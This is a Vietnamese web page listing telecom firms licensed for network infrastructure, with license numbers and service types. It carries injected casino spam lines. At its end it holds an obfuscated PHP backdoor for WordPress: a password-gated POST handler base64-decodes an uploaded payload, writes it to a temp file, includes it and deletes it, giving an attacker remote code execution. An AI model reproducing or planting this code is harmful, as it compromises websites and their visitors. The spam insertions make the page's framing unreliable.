Danh sách các doanh nghiệp được cấp giấy phép hạ tầng mạng Việt Nam - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Danh sách các doanh nghiệp được cấp giấy phép hạ tầng mạng Việt Nam

Ngày 12/05/2013 đăng bởi seo3.VS [email protected]

Số liệu theo thống kê của http://vnta.gov.vn

( 28/12/2011 12:16 SA  )
 
 

STT

Tên doanh nghiệp

Số GP

Loại dịch vụ

1

Tập đoàn Bưu chính Viễn thông Việt Nam (VNPT)

279/GP-CSBĐ

Thiết lập mạng và khai thác dịch vụ điện thoại di động Vinaphone

377/GP-CSBĐ

Thiết lập mạng và kinh doanh dịch vụ thông tin VSAT

299/2000/GP-TCBĐ

Thiết lập mạng và mở dịch vụ chuyển tiếp khung Frame Relay

609/2000/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ viễn thông mạch vòng vô tuyến cố định CDMA-WLL

529/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

530/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định đường dài quốc tế

528/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ điện thoại nội hạt

609/2000/GP-CBĐ

Thiết lập mạng và cung cấp dịch vụ viễn thông mạch vòng vô tuyến cố định CDMA-WLL

1119/GP-BTTTT

Thiết lập mạng viễn thông di động mặt đất tiêu chuẩn IMT-2000

2

Công ty Thông tin di động VMS – VNPT

1118/GP-BTTT

Thiết lập mạng viễn thông di động mặt đất tiêu chuẩn IMT-2000

431/2000/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ di động mặt đất

3

Tổng công ty viễn thông Quân đội (Viettel)

110/1998/GP-TCBĐ

Thiết lập mạng và cung cấn dịch vụ nhắn tin

111/1998/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ di động mặt đất

112/1998/GP-TCBĐ

Thiết lập mạng và cung cấn dịch vụ điện thoại trung kế vô tuyến

113/1998/GP-TCBĐ

Thiết lập mạng và cung cấn dịch vụ điện thoại công cộng PSTN

891/2001/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ thuê kênh riêng

1116/GP-BTTT

Thiết lập mạng viễn thông di động mặt đất tiêu chuẩn IMT-2000

965/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định vệ tinh VSAT

4

Công ty Cổ phần viễn thông Hà Nội (HANOI TELECOM)

84/2003/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ  cố định nội hạt, thuê kênh nội hạt

951/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ  di động mặt đất

53/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ  cố định nội hạt

54/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ  cố định đường dài trong nước

55/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ Cố định quốc tế

1115/GP-BTTTT

Thiết lập mạng viễn thông di động mặt đất tiêu chuẩn IMT-2000

5

Công ty Cổ phần viễn thông di động G-tel Mobile

343/GP-BTTTT

Thiết lập mạng viễn thông CĐ mặt đất

542/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ viễn thông đường dài trong nước

1328/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ di động mặt đất

6

Công ty Bưu chính Viễn thông Sài gòn (Saigon Postel)

193/1999/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ điện thoại trung kế vô tuyến

312/1999/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt, ISDN, Lease Line

1156/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

1157/2006/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định quốc tế

7

 

1136/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt

254/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

255/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định quốc tế

8

Công ty thông tin điện tử Hàng hải (Vishipel)

723/2000/GP-TCBĐ

Thiết lập mạng viễn thông duyên hải và cung cấp dịch vụ vô tuyến điện bờ- tàu và tàu-bờ

724/2000/GP-TCBĐ

Thiết lập đài vệ tinh mặt đất và cung cấp dịch vụ truy nhập hệ thống vệ tinh INMARSAT

11/2004/GP-BBCVT

Thiết lập trạm vệ tinh mặt đất tại Hà Nội, tp HCM để cung cấp dịch vụ VoIP

75/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định vệ tinh VSAT

9

Tổng Công ty Truyền thông Đa phương tiện Việt Nam (VTC)

252/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định quốc tế

253/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

47/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt

586/GP-BTTTT

Thiết lập mạng viễn thông di động ảo MVNO

10

Công ty Cổ phần viễn thông Đông Dương

64/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ truyền dẫn quốc tế và  cung cấp dịch vụ thuê kênh quốc tế

65/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ đường dài trong nước, thuê kênh đường dài trong nước

63/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụcố định nội hạt

1132/GP-BTTTT

Thiết lập mạng viễn thông di động ảo MVNO

11

Công ty CMC TII

448/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt

12

Công ty CP Hạ tầng viễn thông CMC

1172/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt

1171/GP-BTTTT

thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

1170/GP-BTTTT

Thiết lập mạng và cung cấp dịch vụ cố định mặt đất quốc tế

13

Công ty TNHH Truyền hình cáp Sài gontourist

1960/GP-BTTTT

Mạng viễn thông cố định nội hạt

14

Công ty AVG

621,622/GP-BTTTT

Thiết lập mạng VT cố định vệ tinh và mặt đất

15

Công ty thông tin Viễn thông Điện lực (EVN Telecom)

752/2001/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ thuê kênh riêng

324/2002/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ cố định đường dài trong nước

325/2002/GP-TCBĐ

Thiết lập mạng và cung cấp dịch vụ cố định nội hạt

82/2003/GP-BBCVT

Thiết lập mạng và cung cấp dịch vụ cố định quốc tế

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}